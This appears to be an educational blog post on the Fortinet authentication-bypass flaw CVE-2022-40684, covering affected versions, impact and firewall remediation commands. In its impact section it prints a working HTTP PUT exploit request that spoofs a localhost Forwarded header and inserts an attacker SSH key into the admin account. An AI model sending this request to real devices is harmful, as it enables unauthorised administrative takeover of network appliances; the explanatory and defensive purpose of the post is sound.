CVE-2022-40684
About The Vulnerability
CVE-2022-40684 is an authentication bypass vulnerability in some of the Fortinet products like FortiOS, Fortiproxy and FortiSwitchManager. This means, using this vulnerability the attacker can bypass the authentication and login as an admin. The base score for this vulnerability is 9.8 making it highly critical. Before moving further let’s understand what are these products:
- FortiOS: As the name suggests FortiOS, the Fortinet Network Operating System, is the heart of the Fortinet Security. This operating system, is at the core of the Security Fabric and ties all components together to ensure a tight integration across an organization’s entire deployment.
- FortiProxy: It is a secure web proxy that protects employees against internet-borne attacks by incorporating multiple detection techniques such as web filtering.
- FortiSwitchManager (FSWM) is the on-premise management platform for the FortiSwitch product. FortiSwitch units connect to FortiSwitch Manager over the layer-3 network. You can configure a large number of FortiSwitch units with this FortiSwitch-management-only platform.
Affected products from this CVE
- FortiOS version 7.2.0-7.2.1 and 7.0.0-7.0.6
- FortiProxy version 7.0.0-7.0.6 and 7.2.0
- FortiSwitchManager version 7.0. and 07.2.0
Impact
The bug will allow an unauthenticated user to perform operation directly on the admin panel via some HTTP/S requests (methods can be GET, POST, DELETE etc). Having administrator role may cause some of the following events:
- Control take over the entire application
- Gaining access to internal infrastructure
- Addition or deletion of users
- Exposure to sensitive data
- Modify the admin users’ SSH keys to enable the attacker to login to the compromised system
- Tampering with different config files, etc.
Taking an example of an HTTP PUT request that can be used to add a new SSH key, enabling the attacker to SSH into the affected system as administrator.
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\”” }
- Using the Fowarded header an attacker is able to set the client_ip to “127.0.0.1”.
- The “trusted access” authentication check verifies that the client_ip is “127.0.0.1” and the User-Agent is “Report Runner” both of which are under attacker control.
Remediation
“Finding remedy is way more important than finding a fault”
Following are some of the remediation to protect an organization from CVE-2022–40684:
- Up-gradation of impacted products.
Upgrade FortiOS version to ≥7.2.2 and ≥7.0.7
Upgrade FortiProxy version to ≥7.2.1 and ≥ 7.0.7
Upgrade FortiSwitchManager version ≥7.2.1 and ≥7.0.1 - Disable the http/https administrative interface on FortiOS, FortiProxy and FortiSwitchManager.
- For FortiOS, limit IP addresses that can reach the administrative interface
config firewall address
edit "my_allowed_addresses"
set subnet <MY IP> <MY SUBNET>
end
Then create an Address Group:
config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
end
Create the Local in Policy to restrict access only to the predefined group on management interface (here: port1):
config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next
edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
end
If using non default ports, create appropriate service object for GUI administrative access:
config firewall service custom
edit GUI_HTTPS
set tcp-portrange <admin-sport>
next
edit GUI_HTTP
set tcp-portrange <admin-port>
end
Use these objects instead of “HTTPS HTTP “in the local-in policy 1 and 2 below.
4. For FortiProxy, limit IP addresses that can reach the administrative interface (here: port1):
config system interface
edit port1
set dedicated-to management
set trust-ip-1 <MY IP> <MY SUBNET>
end
This comes to an end and I hope you liked this blog, if I was mistaken at any part then feel free to comment out as I am also learning. Do share it with people in your network.